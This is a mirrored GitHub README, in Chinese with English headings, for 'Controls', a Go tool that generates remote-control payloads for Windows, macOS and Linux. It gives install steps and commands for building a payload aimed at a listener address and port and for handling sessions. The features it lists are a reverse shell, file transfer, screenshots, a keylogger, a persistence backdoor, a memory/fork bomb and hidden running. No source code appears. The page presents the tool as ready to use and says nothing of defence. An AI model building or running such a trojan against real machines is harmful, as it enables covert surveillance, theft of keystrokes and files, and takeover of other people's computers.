GithubHelp home page GithubHelp logo

controls's Introduction

Controls Payload Generator

Controls用来生成控制远程操作系统的Poc。

Install

$ go get github.com/1os4r/Controls
$ go get github.com/kbinani/screenshot
$ go get github.com/lxn/win
$ go get github.com/matishsiao/goInfo
$ go get golang.org/x/sys/windows
$ cd ~/go/src/github.com/1os4r/Controls
$ go run main.go

How to Use

命令 参数及介绍
generate 生成控制程序 (e.g. generate lhost=192.168.0.100 lport=8080 fname=test --windows)
lhost= 指定目标ip
lport= 指定目标端口
fname= 指定输出文件名称
--windows 目标系统为 Windows
--macos 目标系统为 Mac OS
--linux 目标系统为 Linux
listen 从本地的一个端口监听 (e.g. listen lport=8080)
serve 服务文件
exit 退出
命令 参数及介绍
download 下载文件
upload 上传文件
screenshot 截屏
keylogger_start 键盘记录
keylogger_show 输出键盘记录内容
persistence_enable 维持后门
persistence_disable 移除后门
getos 获取系统名称
lockscreen 锁定目标屏幕
openurl 打开指定URL
bomb 内存炸弹
clear 清屏
back 挂起会话
exit 关闭会话

Features

作用 Win MacOS Linux
Reverse Shell X X X
Download File X X X
Upload File X X X
Screenshot X X X
Keylogger X
Persistence X
Open URL X X X
Get OS Info X X X
Fork Bomb X X X
Run Hidden X

controls's People

Contributors

1os4r avatar

Stargazers

侬佪 avatar  avatar

Watchers

 avatar

Forkers

lanpan999

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.